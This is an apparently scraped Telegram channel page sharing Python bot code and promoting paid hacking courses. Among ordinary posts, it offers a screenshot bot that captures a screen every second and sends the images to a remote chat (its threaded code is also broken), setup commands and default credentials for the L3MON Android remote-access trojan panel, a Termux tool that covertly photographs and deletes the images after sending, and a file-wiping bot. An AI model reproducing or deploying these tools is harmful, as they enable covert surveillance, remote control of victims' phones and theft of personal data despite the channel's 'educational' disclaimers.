Python Telegram Bots
734 subscribers
1 photo
3 videos
1 file
37 links
All types of python telegram bot with explanation. By @EFXTV

This channel is intended solely for educational and awareness purposes. Any illegal activity is a...

Backup Channel https://t.me/+_w-03ZG1E_thMDhl

Donate: https://buymeacoffee.com/efxtv
Download Telegram
Please share for more
Python Telegram Bots pinned ยซTelegram Bot for Hard Reset (Windows machines) ๐Ÿ›ก Note: This Telegram bot allows authorized users to perform a hard reset of files and directories in the user's home directory. It must be used ethically and with caution, as it involves permanent data deletion.โ€ฆยป
hi
๐Ÿ‘2โค1
Donate to keep this project going https://buymeacoffee.com/efxtv

๐Ÿ”ง Upcoming Telegram Bot Project:

1. ๐Ÿง  AI-Powered Terminal Assistant
โ€” Execute Linux commands, get instant CLI help, or automate tasks via Telegram.


2. ๐Ÿ•ต๏ธ Username Recon Bot
โ€” Search over 100+ social platforms for a given username.


3. ๐Ÿ“ฒ APK Analyzer Bot
โ€” Upload an APK and get permissions, trackers, and security risk details.


4. ๐Ÿ’ฃ Exploit Checker Bot
โ€” Check known CVEs & exploits for a given domain, IP, or software version.


5. ๐ŸŽฏ Phishing Link Detector Bot
โ€” Send a suspicious URL to the bot and itโ€™ll scan for phishing/malware risks.


6. ๐Ÿ” Password Strength + Breach Check Bot
โ€” Users can test password safety (locally hashed) & check against leaked DBs.


7. ๐Ÿ›ฐ๏ธ Satellite Live Tracker Bot
โ€” Track Starlink, ISS, or satellites live from Telegram.


8. ๐Ÿ“ž Disposable Number Bot
โ€” Instantly get a temporary phone number for verification use (free/limited).


9. ๐Ÿงฐ Port Scanner Bot
โ€” Input an IP/domain and get common open ports + banner grab info.


10. ๐Ÿงฌ Metadata Extractor Bot
โ€” Upload any file or image and the bot returns detailed metadata (EXIF, PDF info, etc).


11. ๐ŸŽฅ CCTV/IP Cam Viewer Bot โ€” Stream local RTSP feeds securely through Telegram.

Donate to keep this project going https://buymeacoffee.com/efxtv
โค1
Are you a developer or sysadmin who constantly needs to check your server's IP address? ๐Ÿค” Forget about logging in just to find a simple IP!

We've created a simple and effective solution: a Python script that sends your server's IP and OS details directly to a Telegram bot! ๐Ÿค–๐Ÿ’ป

Here's what it does:
โœ… Gets your server's local IP address.
โœ… Determines the operating system (e.g., Linux, Windows, macOS).
โœ… Sends an automatic message to your Telegram bot.

It's the perfect little tool for when you need to quickly SSH into your machine or just want to keep an eye on your server's status. It's simple, lightweight, and super convenient! ๐Ÿš€

All you need is the Python script and a Telegram bot token. Set it up as a cron job, and you'll always have your IP address just a message away.

Donate to keep this project going https://buymeacoffee.com/efxtv

TELEGRAM BOT ADDRESS [ DOWNLOAD NOW ]

FULL PROJECT @errorfix_tv

#Python #TelegramBot #SSH #Server #DevOps #Automation
๐Ÿ‘2
import requests
import socket
import platform

TOKEN = 'YOUR_BOT_TOKEN'
CHAT_ID = 'YOUR_CHAT_ID'

def get_local_ip():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("192.168.1.1", 80))
ip = s.getsockname()[0]
s.close()
return ip
except:
return "Could not determine IP"

def send_message():
ip = get_local_ip()
msg = f"OS: {platform.system()}\nIP: {ip} is up"
url = f"https://api.telegram.org/bot{TOKEN}/sendMessage"
requests.post(url, data={'chat_id': CHAT_ID, 'text': msg})

if __name__ == "__main__":
send_message()


#telegrambot
@python_telegram_bot_source_codes
#python_telegram_bot_source_codes
โค3
Screenshot telegram BOT

import os
import time
import threading
import pyautogui
import cv2
import numpy as np
from telegram import Update
from telegram.ext import Updater, CommandHandler, CallbackContext

# Global variable to control the screenshot thread
screenshot_thread = None
screenshot_interval = 0
is_running = False
user_chat_id = None

def start(update: Update, context: CallbackContext):
update.message.reply_text('Welcome to Screenshot Bot! Use /screenshot <duration> to start taking screenshots.')

def screenshot(update: Update, context: CallbackContext):
global screenshot_thread, screenshot_interval, is_running, user_chat_id
if is_running:
update.message.reply_text('Screenshot process is already running.')
return

try:
duration = context.args[0] # Get the duration from the command
if duration.endswith('m'):
duration = int(duration[:-1]) * 60 # Convert to seconds
else:
update.message.reply_text('Please specify duration in minutes (e.g., 1m).')
return

user_chat_id = update.message.chat_id
screenshot_interval = 1 # Interval of 1 second for taking screenshots
is_running = True
update.message.reply_text(f'Starting screenshot every {screenshot_interval} second(s) for {duration} seconds.')

# Start the screenshot thread
screenshot_thread = threading.Thread(target=take_screenshots, args=(duration,))
screenshot_thread.start()

except (IndexError, ValueError):
update.message.reply_text('Usage: /screenshot <duration in minutes (e.g., 1m)>')

def take_screenshots(duration):
start_time = time.time()
while (time.time() - start_time) < duration:
# Take a screenshot
screenshot = pyautogui.screenshot()
screenshot_np = cv2.cvtColor(np.array(screenshot), cv2.COLOR_RGB2BGR)
file_path = 'screenshot.png'
cv2.imwrite(file_path, screenshot_np) # Save the screenshot
# Send the screenshot to the user
context.bot.send_photo(chat_id=user_chat_id, photo=open(file_path, 'rb'))
time.sleep(screenshot_interval)

global is_running
is_running = False
screenshot_thread = None

def stop(update: Update, context: CallbackContext):
global is_running
if is_running:
is_running = False
update.message.reply_text('Screenshot process stopped.')
else:
update.message.reply_text('No active screenshot process to stop.')

def main():
# Replace 'YOUR_TOKEN' with your bot's token
updater = Updater('YOUR_TOKEN', use_context=True)
dp = updater.dispatcher

dp.add_handler(CommandHandler("start", start))
dp.add_handler(CommandHandler("screenshot", screenshot))
dp.add_handler(CommandHandler("stop", stop))

updater.start_polling()
updater.idle()

if __name__ == '__main__':
main()
๐Ÿ‘7โค1
Join VIP ๐Ÿ˜Ž

One time fee Life time access to our premium content.

โœจ Link 1 [ JOIN ]

โœจ Link 2 [ JOIN ]

โœจ Link 3 [ JOIN ]

โœจ Link 4 [ JOIN ]

โœจ Link 5 [ JOIN ]

๐Ÿ’ฅ 90% practical 10% theory

๐Ÿ’ฅ You must be 18+

๐Ÿ’ฅ No Junks allowed

โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”
โ™ฅ๏ธ  Telegram Channel - @efxtv ๐Ÿฎ
โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”
JOIN Voice Chat
๐Ÿ‘‰ https://t.me/+poDgK-E2Y_5iYTU9

โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”
โ™ฅ๏ธ  Telegram Channel - @efxtv ๐Ÿฎ
โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”
โค1
L3MON Docker Image 2025

Note: This Docker project has been created for students only.

You are free to modify it, but please do not misuse it in any way.

We will not be responsible for any kind of damage.

โœจ Step 0 - Install docker
sudo apt update && sudo apt upgrade -y
sudo apt update
sudo apt install -y docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin

โœจ Step 1- Pull docker image
docker pull efxtv/l3mon

โœจ Step 2- Create a container
docker run -d -p 22533:22533 -p 22222:22222 -p 2222:22 --name l3mon efxtv/l3mon

โœจ Step 3- Run docker shell
docker exec -it ContainerID bash

โœจ Step 4- Login L3MON
http://localhost:22533/

โœจ Step 5- Login password
login: admin
pass: efxtv

I am thankful for your presence and response. It really motivates us.

โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”
โ™ฅ๏ธ  Telegram Channel - @efxtv ๐Ÿฎ
โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”
โค3๐Ÿ‘1
Python Telegram Bots pinned ยซL3MON Docker Image 2025 Note: This Docker project has been created for students only. You are free to modify it, but please do not misuse it in any way. We will not be responsible for any kind of damage. โœจ Step 0 - Install docker sudo apt update &&โ€ฆยป
โญ Termux Auto-Image-Capture-TelegramBot

Capture โ†’ Compress โ†’ Send โ†’ Delete

โœ๏ธ Note: Capture image using termux (Termux API need to be installed)

โœจ A stable synchronous method for automated photo capture and Telegram sending.

๐Ÿ‘‰ Takes photos, compresses them, sends them to Telegram, and deletes them automatically.
Check /data/data/com.termux/files/home/.snap/app_error.log for silent errors.

๐Ÿ‘‰ USAGE:
$ app2telegrambotintWorkingLowQuality.py <N> <T> <C>

๐Ÿ‘‰ Arguments:
Hit
python3 app.py

to know more

STOPPING THE SCRIPT:
$ pkill -f app.py

Download script [ Here ]

@efxtve
๐Ÿ‘2
Forwarded from EFXTV VIP 2.0
Media is too big
VIEW IN TELEGRAM
About Video:
This video is part of our Android Reverse Engineering Course, where we break down the modern techniques hackers use to deceive users in real-world scenarios, and in this example, youโ€™ll see how attackers cleverly manipulate trust to convince victims to install malicious applications that silently steal personal files without triggering any warnings or notifications, helping you understand not just what happens, but how and why it works from an attackerโ€™s perspective so you can recognize, prevent, and defend against such threats in the real world; to join our premium classes and get access to 100% free tools & course talk to the admin at EFX Tv.

Top courses:
1. Ethical Hacking a2z
2. Android Reverse Engineering
3. Virtual Agents and Telegram
4. Java wirh 100+ Projects
5. Android Application Development
6. Network and Security 2.0

๐Ÿ–ฅ๏ธ Admin: @errorfix_tv
โค3
Python Telegram Bots pinned ยซGroups : @efxtv @efxtve @LinuxClassesEFXTv Whatsapp : Here Python Bots : @python_telegram_bot_source_codes Join VIP : https://t.me/+egpQDeBtGk8wYWU1 Join VIP : https://t.me/+egpQDeBtGk8wYWU1 Admin @errorfix_tvยป
Forwarded from Linux Tutorials and Talk
All the 5 parts will be uploaded in our private channel

๐Ÿ”“ https://t.me/+kh06W1OFziI1MDc9
๐Ÿ”“ https://t.me/+kh06W1OFziI1MDc9
๐Ÿ”“ https://t.me/+kh06W1OFziI1MDc9
๐Ÿ”“ https://t.me/+kh06W1OFziI1MDc9

Note: We might not be able to share
this type of (100% educational) content publicly anymore.

If youโ€™re already inside our private groupโ€ฆ you know why ๐Ÿ˜

Drop a reaction if youโ€™re in.

Or Join Above

Ask to approve : @errorfix_tv
โค1
Python Telegram Bots pinned ยซAll the 5 parts will be uploaded in our private channel ๐Ÿ”“ https://t.me/+kh06W1OFziI1MDc9 ๐Ÿ”“ https://t.me/+kh06W1OFziI1MDc9 ๐Ÿ”“ https://t.me/+kh06W1OFziI1MDc9 ๐Ÿ”“ https://t.me/+kh06W1OFziI1MDc9 Note: We might not be able to share this type of (100% educational)โ€ฆยป